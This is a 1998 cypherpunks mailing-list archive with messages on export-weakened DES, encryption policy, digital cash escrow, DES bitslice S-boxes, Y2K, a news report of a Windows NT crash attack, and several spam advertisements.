At 11:55 PM -0800 3/2/98, Bill Stewart wrote:
>>Is CDMF secure?  and, What sort of algorithm is it?  Thanks.
>
>CMDF is a version of DES watered down to 40-bit key strength.
>I think IBM was to blame; it was designed for exportability.

Well, to IBM's credit, they didn't call it secure.  They called it a Data
Masking Facility.


-------------------------------------------------------------------------
Bill Frantz       | Market research shows the  | Periwinkle -- Consulting
(408)356-8506     | average customer has one   | 16345 Englewood Ave.
frantz@netcom.com | teat and one testicle.     | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@cs.umbc.edu>
Date: Tue, 3 Mar 1998 20:01:30 -0800 (PST)
To: Crypto Announce -- Crypto UMBC <theory-local@cs.umd.edu>
Subject: Barry Smith (FBI) to speak this Friday at 3:30pm
Message-ID: <Pine.SOL.3.95.980303230011.4201C-100000@topdog.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


   The UMBC Security Technology Research Group presents

     A Law-Enforcement Perspective on Encryption Policy

			Barry Smith
	       Supervisory Special Agent, FBI

	    moderated by journalist Peter Wayner

		      3:30pm - 5:00pm
		   Friday, March 6, 1998
		      Lecture Hall III
	       University of Maryland, Baltimore County
    http://www.cs.umbc.edu/events/spring98/crypto.shtml

The second lecture and discussion in a two-part forum on
encryption policy.  Journalist Peter Wayner will introduce
and moderate the event, which is free and open to the
public.  In Part I, freedom activist John Gilmore and Fritz
Fielding (Ex-Associate General Councel, NSA) gave their
divergent views, focusing on the Burnstein case.

Barry Smith will articulate the needs of law enforcement to
conduct lawful wiretaps; he will advocate the use of
key-recovery techniques to achieve this end as a way that
provides adequate privacy to law-abiding citizens.

Schedule: The event will begin with a brief (10 minute)
introduction by Peter Wayner.  Following Barry Smith's talk,
which will last approximately 45 minutes, there will be an
opportunity to ask questions for approximately 20-30
minutes.

Questions: Attendees are encouraged to ask questions in
advance by sending email to sherman@cs.umbc.edu

Directions: Take Exit #47B off interstate I-95 and follow
signs to UMBC.  LH III is in the Administration Building,
adjacent visitor's parking lot near the I-95 entrance to
UMBC.  

Host: Dr. Alan T. Sherman
      Associate Professor, Computer Science
      sherman@cs.umbc.edu
      http://www.umbc.edu
      (410) 455-2666

     This event is held in cooperation with the UMBC
	       Intellectual Sports Council
		       Honors College
	       Phi Beta Kappa honors society
                   CMSC Council of Majors
		   IFSM Council of Majors
		ACM Student Chapter at UMCP






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 4 Mar 1998 01:48:06 -0800 (PST)
To: Michael Camp <cypherpunks@toad.com
Subject: Re:
In-Reply-To: <Pine.3.89.9803031226.A17784-0100000@bc.seflin.org.>
Message-ID: <3.0.5.32.19980304014614.00874cc0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:09 PM 3/3/98 -0500, Michael Camp wrote:
>
>help b093161c@bc.seflin.org
>
>
>
cypherpunks-request@algebra.com
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Unicorn <hvdl@sequent.com>
Date: Tue, 3 Mar 1998 23:51:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: DDJ Crypto CD has arrived!
In-Reply-To: <34F25310.2A29@ziplink.net>
Message-ID: <19980304083749.53098@sequent.com>
MIME-Version: 1.0
Content-Type: text/plain


--- On Mar 02, Random User apparently wrote -----------------------------------

> On Mon, 23 Feb 1998, Peter Trei wrote:
> 
> > Well, it's finally here.
> 
> It has also arrive in Canada.

So when will it arrive outside of the US and Canada? ;-)

--- and thus sprach: Random User <mctaylor@privacy.nb.ca> ---------------------

Ciao,
Unicorn.
-- 
======= _ __,;;;/ TimeWaster (GSM: +31 653 261 368) =========================
     ,;( )_, )~\| A Truly Wise Man Never Plays   PGP: 64 07 5D 4C 3F 81 22 73
    ;; //  `--;     Leapfrog With A Unicorn...        52 9D 87 08 51 AA 35 F0
==='= ;\ = | ==== Youth is not a time in Life, It is a State of Mind! =======





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 4 Mar 1998 03:08:42 -0800 (PST)
To: Unicorn <hvdl@sequent.com>
Subject: Re: DDJ Crypto CD has arrived!
In-Reply-To: <19980304083749.53098@sequent.com>
Message-ID: <Pine.BSF.3.96.980304122130.27069M-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Mar 1998, Unicorn wrote:

> --- On Mar 02, Random User apparently wrote -----------------------------------
> 
> > On Mon, 23 Feb 1998, Peter Trei wrote:
> > 
> > > Well, it's finally here.
> > 
> > It has also arrive in Canada.
> 
> So when will it arrive outside of the US and Canada? ;-)

It hasn't yet? These Cypher Criminals are losing their edge.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 4 Mar 1998 13:16:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Senator plans to ban .gov porn-parodies; new crypto-campaign
Message-ID: <Pine.GSO.3.95.980304131543.19690B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 4 Mar 1998 13:15:35 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Senator plans to ban .gov porn-parodies; new crypto-campaign

More on Gates in NYC and the FBI's antihacker crusade is at
the URL below. --Declan

===========

http://cgi.pathfinder.com/netly/afternoon/0,1012,1782,00.html

The Netly News / Afternoon Line
March 4, 1998

Loin-cloth

   One lawmaker who doesn't seem to have much of a sense of humor about
   titillating web sites is Sen. Lauch Faircloth (R-N.C.). When his
   presumably technology-impaired staffer stumbled across whitehouse.com
   and found not Hillary Clinton's child care proposals but a doctored
   photo of Hillary in leather, Faircloth decided to take action. "I plan
   to introduce legislation that would ban the assignment of popular
   government agency names to anyone," he told The Netly News after
   speaking at an Internet child safety seminar this afternoon. "Can you
   imagine how many people have thought they were contacting the White
   House only to see that?" A better question might be which site is the
   more popular one. --By Declan McCullagh/Washington

Might Makes Right

       Congress rarely does the right thing for the right reason.Instead,
   lobbyists vie to make voting the wrong way too politically costly for
   legislators.

       Now a new coalition, called Americans for Computer Privacy, is
   trying out this strategy on encryption legislation. The group of high
   tech firms and nonprofit groups aims to convince lawmakers that
   supporting restrictions on either the domestic use or overseas
   shipment of encryption productions is too politically painful.

       "We would not turn the keys to our front doors over the
   government. Why should we have to turn over the keys to our
   computers?" asked ACP counsel and former White House lawyer Jack
   Quinn.
   
         To convince Americans that ACP's answer is the right one, the
   coalition has gathered together an advisory panel of former spooks and
   law enforcement agents.

       Quinn told the Netly News that his strategy has already won
   results: "Senior officials at the National Security Council and the
   vice president's office" this morning signaled they're willing to sit
   down at the table for a friendly chat about crypto-laws. --By Declan
   McCullagh/Washington








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 4 Mar 1998 23:50:43 -0800 (PST)
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Digital Bearer Settlement
In-Reply-To: <v04003a05b121f23f572d@[209.88.68.227]>
Message-ID: <3.0.5.32.19980304152937.007e0c20@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Nice article, and I'll have to see if I can get Ian
to talk about HINDE for this month's Bay Area Cypherpunks.

One thing I noticed while reading it, though, is that you still have
"and then you go to jail" at the end of some transaction failure branches,
though most of the failure branches end with "Nothing happens".
While you're not doing book entry at every step,
bearer instruments still depend on the maker honoring them,
whether it's exchanging the bank note for gold pieces
or trading the digicash bits for Federal Reserve Notes --
"then the banker goes to jail" can still happen,
and a digicash world may not have as many S&L Bailout
political favors as the Reagan Years provided.
Also, there are the transactions where you trade
digicash for goods&services, and there's still the problem
of making sure the goods&services got delivered,
making sure the payment got delivered, and dealing with
poor quality products.  For purely digital products,
like consulting hours, movies, and microcode, there are
protocols that can take care of the exchange,
but for goods&services involving real stuff,
like pizza delivery, there's still an element of
trust required.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@206.40.207.40>
Date: Wed, 4 Mar 1998 17:10:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Win95/NT attack in CNN news
Message-ID: <3.0.5.32.19980304171023.0079bd10@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



http://www.cnn.com/TECH/computing/9803/04/internet.attack.ap/


Hacker attack crashes
                    Windows systems
                    coast-to-coast

                    March 4, 1998
                    Web posted at: 10:05 a.m. EST (1505 GMT) 

                    SAN DIEGO (AP) -- Computer
                    security experts blame hackers for
                    an Internet attack that caused
                    computers running Microsoft's
                    Windows NT software to crash
                    from coast to coast, mostly in
                    government and university offices. 

                    While no real harm was done, it
                    was too early to gauge the full extent of the attack.
Experts said the
                    far-flung glitches could only have been the result of a
deliberate act,
                    The San Diego Union-Tribune reported Wednesday. 

                    The crash Monday night affected computers running
Windows NT
                    -- the operating system for larger computers and
networks -- and
                    Windows 95. 

                    Problems were reported at the Massachusetts Institute of
                    Technology, Northwestern University, the University of
Minnesota
                    and University of California campuses in Berkeley,
Irvine, Los
                    Angeles and San Diego. 

                    Unclassified Navy computers connected to the Internet
also crashed
                    on Point Loma and in Charleston, South Carolina,
Norfolk, Virginia,
                    and elsewhere. 

                    "It happened so fast," said Craig Huckabee, a research
associate in
                    the Computer Systems Laboratory at the University of
Wisconsin.
                    "In our department, I would have to say about 90
percent of the
                    machines were affected." 

                    Despite the coordination of the attack, the computers
that crashed
                    could be restarted without losing information, computer
security
                    experts said. 

                    The attackers used the Internet to broadly distribute a
snippet of
                    deliberately malformed data, said Ron Broersma, a
civilian computer
                    security expert at the Navy labs on Point Loma. 

                    The prank exploits a glitch in the Windows NT program by
                    instructing the computer to devote excessive memory
resources to
                    solve a problem that can't be solved. 

                    Microsoft security manager Ed Muth said the company is
working
                    on a software patch that fixes the vulnerability in
Windows NT
                    programs. 

                    An unidentified Microsoft executive told the
Union-Tribune it was
                    unknown if the attack was related to Microsoft Chairman
Bill Gates'
                    appearance Tuesday at a Senate hearing where he
defended his
                    company against allegations of antitrust violations. 
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"But if we have to use force, 
it is because we are America;
we are the indispensable nation."
---Secretary of State Madeleine K. Albright
http://www.jya.com/see-far.htm







	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 4 Mar 1998 17:49:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Win95/NT attack in CNN news
In-Reply-To: <3.0.5.32.19980304171023.0079bd10@206.40.207.40>
Message-ID: <v04003a0cb123b1fc557b@[130.248.15.51]>
MIME-Version: 1.0
Content-Type: text/plain


The best part about it was the quote on the front page of the
San Diego Union-Tribune:

"This is so weird, so widespread, and the press doesn't seem to know about
it," Broersma said. "Maybe it's because people are used to their Windows
software crashing all the time."

-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 4 Mar 1998 18:51:16 -0800 (PST)
To: j orlin grabbe <kalliste@aci.net>
Subject: Brickell and Sandia
Message-ID: <34FE12B4.6021@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 3/4/98 6:59 PM

Orlin

While trying to recover from the stomach flu, I am going over your stuff
summarized at 

  http://www.aci.net/kalliste/dcguide.htm

You wrote at [Brickell-Gemmell-Kravitz.]
http://www.aci.net/kalliste/sandia.htm

  Sandia National Laboratories have created the digital cash equivalent
of the Clipper chip: an "anonymous"     
  digital cash system that would give participants privacy from all
viewers, except for the government agencies 
  that would control the secret keys required for backdoor access.

and  

  Why is Sandia interested in digital cash systems? Well, Sandia is
responsible for all non-nuclear components    
  of nuclear weapons.  The security of nuclear weapons depends partly on
cryptology. The code- breaking 
  National Security Agency (NSA), for example,  is responsible for the
communication security of the 
  Minuteman missile, as well as the codes by which the President must
identify himself to authorize a nuclear   
  strike.

Brickell and Simmons were in the COMPUTATIONAL/COMPUTER SCIENCES & MATH
CENTER,
directorate 1400, at Sandia.

I worked in the ELECTRONIC SUBSYSTEMS CENTER, directorate 2300, 
division 2311, when I was project leader of the Missile Secure
Cryptographic Unit, the small missile,  [between about 1982-86].

All of the nuclear bomb crypto implmentation work was done in 2300, not
1400.

The MAIN difference is that the 2300 people were a bunch of PRACTICAL
engineers and REAL-PRACTICAL software types.  NOT theoreticians.

Gus Simmon once tried to get into the implentation business.  

Simmons bought an Intel 320 [?] development system.  The Intel 320 was a
piece of junk and nothing happened with Simmons' implementation work.

Simmons' try, naturally, caught the attention of 2300 management, for
business reasons, of course.

I LOVE reading all of this stuff from a Sandia historical standpoint.

The REAL WORLD of Sandia crypto stuff in pockmarked by some REAL
SCREW-UPS.  Which all
of us implementers shared so as not to commit the same mistakes again.

I asked my department manager, Kent Parsons, how the screw-ups affected
him.  He responded that
it made him sleepy.  These were MULTI- if not HUNDREDS- million dollar
screw-ups.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 4 Mar 1998 16:29:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ed yourdon on Y2k armaggedon
In-Reply-To: <199803022316.PAA18159@netcom16.netcom.com>
Message-ID: <199803050029.BAA15356@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


>That said, I'll bet the first taker a dollar against a doughnut that 90%
>of U.S. nuke plants sail right through into the new millenium and don't
>even trip for any technical reason. (I won't bet against
>*political* reasons.)
>
>Why do I think so?
>
>Nuke plants are much less computerized than you might think.
>
>Many still use electromechanical relays to provide important logic
>functions.  Relays have a lot going for them - for instance you never have
>to worry about introduction of stupid software bugs.


What about real bugs introducing themselves into relays? :)

A few years ago a nuke plant wanted to build a computerized control system
and USNRC absolutely gave them hell, requiring them to document every damn
line of it and prove that it could handle all special cases.  But they did
finally approve it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 5 Mar 1998 00:34:01 -0800 (PST)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Digital Bearer Settlement
In-Reply-To: <3.0.5.32.19980304152937.007e0c20@popd.ix.netcom.com>
Message-ID: <199803050833.DAA19434@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980304152937.007e0c20@popd.ix.netcom.com>, on 03/04/98 
   at 03:29 PM, Bill Stewart <bill.stewart@pobox.com> said:

>Nice article, and I'll have to see if I can get Ian
>to talk about HINDE for this month's Bay Area Cypherpunks.

>One thing I noticed while reading it, though, is that you still have "and
>then you go to jail" at the end of some transaction failure branches,
>though most of the failure branches end with "Nothing happens". While
>you're not doing book entry at every step,
>bearer instruments still depend on the maker honoring them,
>whether it's exchanging the bank note for gold pieces
>or trading the digicash bits for Federal Reserve Notes --
>"then the banker goes to jail" can still happen,
>and a digicash world may not have as many S&L Bailout
>political favors as the Reagan Years provided.
>Also, there are the transactions where you trade
>digicash for goods&services, and there's still the problem
>of making sure the goods&services got delivered,
>making sure the payment got delivered, and dealing with
>poor quality products.  For purely digital products,
>like consulting hours, movies, and microcode, there are
>protocols that can take care of the exchange,
>but for goods&services involving real stuff,
>like pizza delivery, there's still an element of
>trust required.

Well there are a couple of different approaches depending on the
environment of the transaction.

If it is what I call a "cash and carry" environment where you, the
merchant, and the product are all physically in the same place then the
transaction can take place as any cash transaction would. the merchant
gives you the product, you give him the e-cash bits and the transaction is
done.

If the environment is a "mailorder" environmet where you and the merchant
are in remote locations then there are two different approaches:

- -- COD:

  You place the order, the merchant delivers it. At the time of delivery
you pay for the product.

- -- Escrow:

   You place the order. After placing the order you transfer your e-cash
bits into an escrow account. When the merchant has verification that the
bits are in escrow he ships the product. Upon recept of the product you
release the funds from the escrow account and the merchant is paid.

    Now with escrow based system you can be more creative with the product
insurance end of things. You an the merchant may agree that there will be
a 30 day trial period where the funds will stay in escrow and during that
period you can judge the quality of the product. If a complaint is filed
with the escrow agent within the 30 day period then you would have X
number of days to return the product and get your money back. Merchants
could set up warranty insurance where x% of sales are kept in an escrow
account to cover returns/warranties. All kinds of fun stuff could be done.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2, Windows/0

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNP5VyY9Co1n+aLhhAQGo+wQAtCHzRWIjR/LsSjn8PRTsXzOijfuplLkB
9JSB5nnb1OHaDUGEepx3K3a00yrXrLTQwO9xfopIu6kO7SEQ+miAMZbPRybLBgH/
6CBqr4/+83C+p3PK2KIPIwZkETp37C0/JSBgfjwn+W6XEREtEQxbUhqT6DaqgkPg
gr58Wb8lGRM=
=eJGN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: debiloo@juno.com
Date: Thu, 5 Mar 1998 09:46:09 -0800 (PST)
To: <--akamriq@aol.com>
Subject: $.03 PHONE CALLS?
Message-ID: <199803051746.JAA18767@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


$.03 PHONE CALLS?
1+ dialing and 800 incoming
Hard To Believe...  But TRUE
With the amazing new Technology, 
you'll see calls on your phone 
bill for $.06, $.04......even $.03
Best of all, it doesn't matter 
what company you're now using.
You don't need to switch carriers!

Call anytime and leave your name,phone #
and a representative will call you back with 
information the phone company 
never wanted you to find out about.

Don't wait , call now! you'll love what we 
have to share with you on this exciting 
New Technology!

Call:   Owen @ 1-408-393-0106




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Rubin <rubin@research.att.com>
Date: Thu, 5 Mar 1998 07:15:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of college and graduate courses in crypto and security
Message-ID: <199803051512.KAA08000@mgoblue.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I maintain a list of college and gruaduate level courses in security 
and cryptography at

   http://www.cs.nyu.edu/~rubin/courses.html

>From time to time, I like to update the list. If you know of
a full semester course in crypto or security that is not on my
list please let me know. URLs are especially useful. Also, if you 
see something on my list that is out of date, let me know.

Thanks,
Avi


*********************************************************************
Aviel D. Rubin                                 rubin@research.att.com
Secure Systems Research Dept.                Adjunct Professor at NYU
AT&T Labs - Research
180 Park Avenue                   http://www.research.att.com/~rubin/
Florham Park, NJ 07932-0971                    Voice: +1 973 360-8356
USA                                            FAX:   +1 973 360-8809

   --> Check out http://www.clark.net/pub/mjr/websec/ for a new
       book on web security (The Web Security Sourcebook).
*********************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkwan@preston.net (Matthew Kwan)
Date: Wed, 4 Mar 1998 15:13:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: DES bitslice S-boxes
Message-ID: <199803042313.KAA10987@preston-gw.preston.net>
MIME-Version: 1.0
Content-Type: text/plain


I've been a bit out of touch with the subject for a while, so could
someone please bring me up to speed in the state of the art of DES
bitslice. In particular, what are the best gate counts for the S-boxes?

About a year ago I produced S-boxes with the following counts

        S-box   S1   S2   S3   S4   S5   S6   S7   S8
        Gates   95   84   89   77   96   87   86   88

(You can download them from http://www.cs.mu.oz.au/~mkwan/bitslice)

However, I was recently told that these have now been beaten by a
significant margin. I thought about it for a while, and came up with
some ideas that should improve the count, but I'd like to know what
I'm aiming for.

Any improvements I make will also be made freely available, so you
have an incentive to help me ;-)


mkwan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 5 Mar 1998 11:18:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Feds bust Inet gambling
Message-ID: <3.0.5.32.19980305111814.007a9b20@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



All parties were consenting but the Fed doesn't like it.

First the virtual betting parlors.
Then the virtual banks and cryptocash.



http://dailynews.yahoo.com/headlines/technology/wired/story.html?s=n/reuters
/980304/wired/stories/gambling_1.html
	
Wednesday March 4 4:56 PM EST 

U.S. authorities launch Internet gambling crackdown

NEW YORK (Reuters) - U.S. federal authorities charged 14 people on
Wednesday with running gambling sites on the Internet in violation of
federal laws. 

In complaints unsealed in Manhattan Federal Court, the U.S. Attorney's
office charged the 14 with using Internet Web sites and telephone lines to
bet on U.S. football, basketball, hockey and baseball games, charging a 10
percent commission per bet. 

At least some of the defendants were scheduled to appear before a U.S.
magistrate judge later on Wednesday. 

The defendants were charged with using Internet sites to open bettor
accounts, usually with a minimum deposit of $500, and then accepting bets
on games and game score spreads and maintaining accounts for clients. 

Client funds were directed to banks or addresses in such offshore locations
as Antigua, Curacao, Costa Rica and Panama, where betting is legal. But the
complaints alleged that the six operations conducted much of their business
within U.S. borders. 

One defendant, Steven Budin, 27, of SDB Global (www.sdbg.com), said his
business used the Internet only for marketing, not to take bets. 

"We don't take wagers over the Internet," he said. 
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"But if we have to use force, 
it is because we are America;
we are the indispensable nation."
---Secretary of State Madeleine K. Albright
http://www.jya.com/see-far.htm







	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 5 Mar 1998 10:11:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.SOL.3.96.980305125302.21425A-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hello,

I have more of a general privacy rather than a crypto question.  I am
trying to set up "tripwires" in the various computer accounts that i have
so i will know if a superuser or sysadmin has accessed them.  (it should
be taken for granted at this point that all sensitive or personal data is 
encrypted and/or stored on floppies)  i of course am only concerned with
doing so for accounts that i don't already have su access with.  i have
accounts on various flavors of UNIX, but i am most interested in
tripwires/scripts for Solaris 2.4-6.  so far, the best i have been able to
come up with is a couple of very ineffective tripwires.

1.  a few lines in .Xlogout that write the host/date stamp to a file that
    is hidden a few directories deep.

    - this of course only works if someone logs in to my account using
    my own login/passwd, and it doesn't work over dialup at all.

2.  i have a .environment file that will write all of the relevant user
    info to a file if that user adds my directory with the "add" command

    - this will catch all superuser accesses *if and only if* they add
    my directory.  they could simply cd into my directory to bypass it.

anyone have any ideas for tripwires or any other methods i can use, having
only regular user access, to monitor ANY accesses made to my account,
especially by superusers/sysadmins?


thanks for your consideration of this question,

ken





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 5 Mar 1998 14:04:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: y2k: 37% govt computers
Message-ID: <199803052204.OAA11157@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Date: Thu, 05 Mar 1998 07:04:43 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Y2K-37% of most critical gov't computers will not be updated
  in time

Source: Los Angeles Times

Thursday, March 5, 1998 

House Panel Warns of Year 2000 Computer Crisis 
By RALPH VARTABEDIAN, Times Staff Writer

WASHINGTON--In the most dramatic warning yet of an impending computer
crisis in the government, a congressional panel said Wednesday that 37% of
the most critical computers used by federal agencies will not be updated in
time to handle dates in the year 2000 and will be subject to widespread
failure. 

The estimate calls into sharp question past assurances by the Clinton
administration that it is moving quickly enough to avert serious outages
that could undermine military forces, benefit payments to the public and
the nation's air transportation system, among much else. 

With just 666 days left until the year 2000, a slew of reports and
investigations in recent weeks have raised serious concerns that the
government is not acting fast enough to avoid serious problems. 

The executive branch has almost 8,000 computer systems that are considered
critical to government operations, and nearly 3,000 of them will not be
able to read dates in 2000, according to the report issued by the
subcommittee on government management, information and technology of the
House Government Operations and Oversight Committee. The computers will
either shut down or spew out erroneous data. 

California Rep. Steve Horn (R-Long Beach), the subcommittee chairman who
has taken the lead in Congress in solving the problem, issued a "report
card" along with the new report that gave the federal government a D-minus
in its efforts to avoid a crisis. 

"Failure is intolerable," Horn said. 

The year 2000 problem results from widespread use of two digits in software
to designate years. Computers assume that every year starts with "19," so
when 2000 arrives, they will interpret "00" as the year 1900. 

President Clinton created a White House panel on Feb. 4 to lead the
government's efforts in solving the problem and appointed John A. Koskinen,
former deputy director at the Office of Management and Budget, to lead the
effort. But Koskinen has not yet started his work, and his panel has hardly
gotten off the ground after 28 days, according to Horn's staff. 

White House press officials did not respond to queries about Horn's report. 

As the scope of the government's problems become clearer, the cost to avert
a crisis is also growing. The Office of Management and Budget had long
insisted that the problem would cost a little more than $2.3 billion to
fix, but that figure has been growing over the last year. Its most recent
estimate pegged the cost at $4 billion. 

Horn estimated that the government is facing a cost of $10 billion. 

 Copyright Los Angeles Times 

     


**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     subscribe ignition-point email@address
or
     unsubscribe ignition-point email@address
**********************************************

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jic" <readmexxx@aol.com>
Date: Thu, 5 Mar 1998 13:42:20 -0800 (PST)
To: Casey631@hotmail.com
Subject: Readme
Message-ID: <199803051737.RAA17689@mailroot.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><A HREF="http://www.wh0re.net/">
Click here!!</A></PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 01088496@17733.com
Date: Thu, 5 Mar 1998 06:36:16 -0800 (PST)
To: Trader@TradeLeads.Web
Subject: RE: Your Trade Posting
Message-ID: <19943672.886214@relay.connect.com.au >
MIME-Version: 1.0
Content-Type: text/plain


Dear Trader,

We saw your posting and would like more information... We are 
open to discovering a new product and true opportunity.

We would like to take this opprotunity to introduce ourselves 
as manufacturers and exporters for Hot-Selling products in 
these categories: Health Care, Personal Electronics, Security 
and Home & Gifts. More than that, we offer China price at 
Japanese quality. OEM projects are welcome.

Are you marketing on the Internet? If not, YOU SHOULD!!
              Discover the secrets of Online Marketing!
REACH "MILLIONS" - ABSOLUTELY FREE - WITH OUR AMAZING
NEW USER-FRIENDLY INTERNET MARKETING EMAIL SOFTWARE!
ELMED provides everything your company needs to communicate 
around the world, around the clock: manage a commercial email 
system, collect email addresses from multiple sources, create 
personalized messages, and email out to your list at the touch 
of a button. 

If we can further assist you, please do not hesitate to contact 
me directly at <nikolaa@usa.net>.

We look forward to being able to develop a long and mutually 
beneficial business relationship.

Best Regards,
Elmed International (China,HongKong,Cyprus) Ltd

Nikola


************** The products Every Home Will Want ***************

(*) LAUNDRY BALLS "CODE WASH"
    ANTI-BACTERIAL, HYPO-ALLERGENIC, ECONOMICAL SOAP SUBSTITUTE, 
    NON-TOXIC, ENVIRONMENTALLY SAFE, REUSABLE UP TO 750 TIMES
    Say Goodbye to Detergents !!!
    It's a whole new concept in washing that's so economical, 
    it saves time, energy, water and fabric softener. 

(*) FULLY AUTOMATIC TREATMENT APPARATUS  
    "World's Best Health Care Product"
    Effective pain & disease relief; Improves metabolism, 
    blood circulation, the nervous system and immunity function; 
    Gold medal EUREKA-Brussel

(*) BACK-STOP Gets Stolen Cars Back /ON-LINE AUTO ALARM/         
    Patented anti-theft paging facility that allows users to 
    immobilise a car being stolen, from a safe distance.    

(*) The World's Leading Internet Marketing Tools!
                       Get Your Business Noticed.
    You cannot successfully market your product, service, or MLM 
    on the Internet without our tools:
    - Precision WebPage Email Address Collector will begin searching 
      for targeted email addresses 
    - The World's Number #1 Bulletproof Bulk Email Software
    - The best Web Site Submission software available ! 
      Auto submits your Web Site to hundres of Major Search Engines.
    - The Web Position Analyser software to analyze, to track, and 
      to help you improve all your Internet search positions 

(*) IDEAL PRODUCTS FOR MAIL ORDER, TV SHOP, MLM, DIRECT MARKETING : 
    - OPTIMAX Internet Relaxation Tool   
    - "EINSTEIN" - A BRAIN WAVE ENHANCING MACHINE
    - CAMMY-BELLE Apparatus for Beautification & Weight Reduction
    - ROCKY-BO Magnetic Beauty-Fit Apparatus                  
    - WONDER CREAM Human body-cell potential activator                     
    - SLEEP SOOTHER (THE DREAM MACHINE)
    - $3.55 Personal Organizer (Data Bank)                         
    - A WONDERFUL WORLD OF SOUNDS - Talking Children's Books 
    - New Solar Products (lights, radio, premiums...)
      . . . AND MUCH MORE !!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 5 Mar 1998 11:24:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199803051920.UAA16885@basement.replay.com>
